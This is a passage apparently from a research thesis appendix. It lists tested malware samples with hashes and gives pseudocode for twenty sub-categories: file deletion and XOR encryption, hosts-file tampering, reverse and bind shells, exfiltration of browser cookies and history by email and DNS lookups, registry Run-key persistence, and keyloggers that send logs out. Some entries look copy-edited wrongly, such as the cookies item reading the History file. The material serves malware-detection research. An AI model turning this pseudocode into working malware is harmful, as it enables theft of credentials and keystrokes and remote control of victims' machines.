4e6f1865486697baed8bc7171d1e4590e
Obfuscated bind shell 3c1c346fe0e8aeb779caa69149edaf6
fb37f00f228d022e73cb79f9a9e27a0c
b
290fe161bc5c9d47e38ea9c2dedeef0e
Hosts file exfiltration 507392754fb29055da428a53be4b70ade
c59af6e2db9155a8b2ca20a78d85536
using email 203337888acd6e2ca34299fd1b4a41c
2
bf15c753af46456352974a8da8e2310
Edge browser history 15f60982c16f9a40d45807f274662a9d8
52ae34082d839d393f4e13b9d4dab10
exfiltration using email d02bde28f135ffcbcc92a69e2ba2cb3
38
7ab209384282e3b709f11c71e498655
Edge browser cookies 773db0eb2dd9a069c1b3f78be12da7ff9f
e0fd0fe238b1c2d96cbb418b64fae454
exfiltration using email c6950feb9bc4c067ee85163f742dcf
9
Hosts file exfiltration a18a2841c0f55cedcc77714bd3fc263d7 5de1cf951adb309d2fa1e92d83c2fffa
using DNS dc37cc635f82b2c855c5a2818b09cc2 d9db8a747f030062a563b41f7fcf8f33

57
619becefb6f9d18cd5365291a37b651
Edge browser history 581ae21f62786e254bf872cf270024627
418cbe29dd2e223941ff82961916b7c
exfiltration using DNS 7fb5c7d004da9f9fdc1b0e2df2dee5a
84
b9023b2353ce3db94e14e851e455c02
Edge browser cookies 375ddd79e135a6d7194ef8079df081c2f
88da5a7ef3f66ade9a8a0682a54e97a4
exfiltration using DNS cfd2dfa8ff8bf8179afc49125fc847b
d
79cf104693316ee3026fe69bfb2d4a8f
baf594d1e312b2586ef0d5b6354ccb5bc
Delete registry key aa77e0f65ccb343cc4ebe1fe2190d4d
9128b31e0139282fbee1876bdd31d56
6
014031bf0c001b4225175656d27817
800853b756bb08c66be7f42804e9e5a65
Modify registry key b13c4e8536c9f40f269669ae574a634
0e81c8181f9d41801b72ba796f73587
be1
26a0045d6559ea73a499a48411459eb
2f0bb800e99439536f854ca38b1dd101b
Add registry key 8245df5d704b1e08bd112adbe08a44b
a21737913a0ee15a206a359d0803f95
66
74b6ddcacc0efe791fd7b8f28304cd2c
42bde7b776a2ace1ae4dfa8fb0b91fba50
Simple keylogger b473ed739d25c0a54429f5a96d0908
90bd7f83bb189a6c090418a8eb541d2
e

Keylogger that sends file 2f192f6057738da3b4c39053b0b28d4ec dfdaf2594afb64ffd30480105721348b


26c52fe885b79f43d1b09f01a2e7e33
with data via DNS cf874e1c63cb6eb58304a71cee6ec40
1

Keylogger that sends file b71d83e533304f2124e044ca6038ed332 958753df3cb662f17dde2760f7ea594


eee824f556061dd2df1febdbe08090c4
with data via email 8f40e2b803fedfeeaf3982a69934ecb
5

58
Appendix B
Pseudocode of the Sub-categories of Malware Tested

1. Delete files
FUNCTION main
SET folder_path
INITIALIZE file_handle

file_handle:= call winapi_findfile(folder_path)


if file_handle == INVALID_HANDLE_VALUE
print “Unable to open directory”
exit
do
call winapi_deletefile(folder_path)
while call winapi_findnextfile(folder_path) !=0

CALL winapi_closefile(file_handle)
return

2. Encrypt files
DECLARE key

FUNCTION encrypt_file (file_path)


SET file = open(file_path)
if file == NULL
print “Unable to open file”
content:= read_file_contents (file)
buffer:= content XOR key
write_file_contents(file, buffer)

FUNCTION main
SET folder_path
NITIALIZE file_handle

file_handle:= call winapi_findfile(folder_path)


if file_handle == INVALID_HANDLE_VALUE
print “Unable to open directory”
exit

59
do
call winapi_deletefile(folder_path)
while call winapi_findnextfile(folder_path) !=0

CALL encrypt_file(file_handle)

CALL winapi_closefile(file_handle)
return

3. Create file
FUNCTION main
SET file_path
INITIALIZE file_handle
SET file_name:= “secret.txt”

file_handle:= call winapi_findfile(folder_path)


if file_handle == INVALID_HANDLE_VALUE
print “Unable to open directory”
exit

call winapi_createfile(file_path)
SET file = open(file_path)
if file == NULL
print “Unable to open file”
buffer:= “S3cr3t”
write_file_contents(file, buffer)

CALL winapi_closefile(file_handle)
return

4. Modify file
FUNCTION main
SET file_path:= "C:\\Windows\\System32\\drivers\\etc\\hosts"

SET file = open(file_path)


if file == NULL
print “Unable to open file”
write_file_contents(file, “127.0.0.1 google.com”)
CALL winapi_closefile(file)
return

60
5. Simple reverse shell
FUNCTION main
SET startup_info
SET process_info
SET socket_address
SET socket
SET ip_address
SET port

INITIALIZE winsock
CALL winapi create_socket
CALL winapi connect_socket
CALL winapi createprocess (cmd,exe)

6. Obfuscated reverse shell


DECLARE key

FUNCTION obfuscate(string)
return string XOR key

FUNCTION main
SET startup_info
SET process_info
SET socket_address
SET socket
SET ip_address:= call obfuscate(ip_address)
SET port

INITIALIZE winsock
CALL winapi create_socket
CALL winapi connect_socket
CALL winapi createprocess ( call obfuscate (“cmd,exe”))

7. Simple bind shell


FUNCTION shell (socket)
SET buffer:= 1024
SET nbytes
SET startup_info
SET process_info

while true
allocate memory for buffer
nbytes := read_socket(buffer)

61
if nbytes <=0
print “Connection closed by client”
break

if buffer = “exit”
print “Closing connection”
break

CALL winapi createprocess (“cmd,exe”)

FUNCTION main
INITIALIZE winsock
SET socket_address
SET socket
SET client

CALL create_socket()
CALL bind_socket(socket)
CALL listen_socket(socket)

while true
client_socket:= call accept_connections(client)
CALL shell(client_socket)

8. Obfuscated bind shell


DECLARE key

FUNCTION obfuscate(string)
return string XOR key

FUNCTION shell (socket)


SET buffer:= 1024
SET nbytes
SET startup_info
SET process_info

while true
allocate memory for buffer
nbytes := read_socket(buffer)

if nbytes <=0
print “Connection closed by client”
break

62
if buffer = “exit”
print “Closing connection”
break

CALL winapi createprocess ( call obfuscate (“cmd,exe”))

FUNCTION main
INITIALIZE winsock
SET socket_address:= obfuscate(socket_address)
SET socket
SET client

CALL create_socket()
CALL bind_socket(socket)
CALL listen_socket(socket)

while true
client_socket:= call accept_connections(client)
CALL shell(client_socket)

9. Hosts file exfiltration using email


FUNCTION main
SET file_path := "C:\\Windows\\System32\\drivers\\etc\\hosts"
SET contents := read file_path
SET email := construct email

INITIALIZE SMTP_transport
Send SMTP commands

10. Edge browser history exfiltration using email


FUNCTION main
SET local_app_dir := env("%LOCALAPPDATA%")
SET file_path := local_app_dir + "\\Microsoft Edge\\User Data\\
Default\\History"
SET contents := read file_path
SET email := construct email

INITIALIZE SMTP_transport
Send SMTP commands

63
11. Edge browser cookies exfiltration using email
FUNCTION main
SET local_app_dir := env("%LOCALAPPDATA%")
SET file_path := local_app_dir + "\\Microsoft Edge\\User Data\\
Default\\History"
SET contents := read file_path
SET email := construct email

INITIALIZE SMTP_transport
Send SMTP commands

12. Hosts file exfiltration using DNS


FUNCTION main
set local_app_dir := "C:\\Windows\\System32\\drivers\\etc\\hosts"
set contents := read file_path
set chunks := split contents

for chunk in chunks do


set encoded := base64_encode(chunk)
CALL system ( nslookup "{encoded}.{hostname}" )

13. Edge browser history exfiltration using DNS


FUNCTION main
set local_app_dir := env("%LOCALAPPDATA%")
set file_path := local_app_dir + "\\Microsoft Edge\\User Data\\
Default\\History"
set contents := read file_path
set chunks := split contents

for chunk in chunks do


set encoded := base64_encode(chunk)
CALL system ( nslookup "{encoded}.{hostname}" )

14. Edge browser cookies exfiltration using DNS


FUNCTION main
set local_app_dir := env("%LOCALAPPDATA%")
set file_path := local_app_dir + "\\Microsoft Edge\\User Data\\
Default\\Cookies"
set contents := read file_path
set chunks := split contents

for chunk in chunks do


set encoded := base64_encode(chunk)

64
CALL system ( nslookup "{encoded}.{hostname}" )

15. Delete registry key


FUNCTION main
INITIALIZE hkey
SET autorun_path = “Software\\Microsoft\\Windows\\CurrentVersion\\
Run"
SET rogue_value = 0

CALL winapi get_module_filename(NULL, path, MAX_PATH)


CALL winapi open_regkey(HKEY_CURRENT_USER, autorun_path, 0,
KEY_SET_VALUE, &key)
CALL winapi delete_regkey_val(hkey, "OneDrive")
CALL winapi close_regkey(key)

16. Modify registry key


FUNCTION main
INITIALIZE hkey
SET autorun_path = “Software\\Microsoft\\Windows\\CurrentVersion\\
Run"
SET rogue_value = 0

CALL winapi get_module_filename(NULL, path, MAX_PATH)


CALL winapi open_regkey(HKEY_CURRENT_USER, autorun_path, 0,
KEY_SET_VALUE, &key)
CALL winapi set_regkey_val(key, "OneDrive", 0, REG_DWORD,
rogue_value, length of path + 1)
CALL winapi close_regkey(key)

17. Add registry key


FUNCTION main
SET path = call get_module_file_name()
INITIALIZE hkey
SET autorun_path = “Software\\Microsoft\\Windows\\CurrentVersion\\
Run"

CALL winapi get_module_filename(NULL, path, MAX_PATH)


CALL winapi open_regkey(HKEY_CURRENT_USER, autorun_path, 0,
KEY_SET_VALUE, &key)
CALL winapi set_regkey_val(key, "ProgramName", 0, REG_SZ, path,
length of path + 1)
CALL winapi close_regkey(key)

65
18. Simple keylogger
FUNCTION flush_buffer(buffer, path)
SET file := open(path)
CALL write (file, buffer)
CALL clear(buffer)

FUNCTION main
SET path := “C:\\Users\\Public\\key.log”
SET buffer
SET buffer_length

while not terminated do


poll key events
if length of buffer == buffer_length
CALL flush_buffer(buffer, path)

if buffer is not empty


CALL flush_buffer(buffer, path)

19. Keylogger that sends file with data via DNS


FUNCTION flush_buffer(buffer, path)
SET file := open(path)
CALL write(file, buffer)
CALL clear(buffer)

FUNCTION dns_query(host, chunk_size, path)


SET contents := read(path)
SET chunks := split contents

for chunk in chunks do


SET encoded := base64_encode(chunk)
SET out := CALL system(nslookup "{encoded}.{hostname}")

FUNCTION main
SET host
SET chunk_size
SET path = “C:\\Users\\Public\\keydns.log”
SET buffer
SET buffer_length

while not terminated do


poll key events
if length of buffer == buffer_length

66
CALL flush_buffer(buffer, path)

if buffer is not empty


CALL flush_buffer(buffer, path)

CALL dns_query(host, chunk_size, path)

20. Keylogger that sends file with data via Email


FUNCTION flush_buffer(buffer, path)
SET file := open(path)
CALL write(file, buffer)
CALL clear(buffer)

FUNCTION send_email(from, to, subject, attachment, smtp_server, username,


password)
SET contents := read(attachment)
SET email := construct email
INITIALIZE smtp_transport
send smtp commands

FUNCTION main
SET sender
SET receiver
SET subject
SET attachment
SET smtp_server
SET username
SET password
SET buffer
SET buffer_length
SET path = “C:\\Users\\Public\\keyem.log”

while not terminated do


poll key events
if length of buffer == buffer_length
CALL flush_buffer(buffer, path)

if buffer is not empty


CALL flush_buffer(buffer, path)

CALL send_email(sender, receiver, subject, attachment, smtp_server,


username, password)

67

You might also like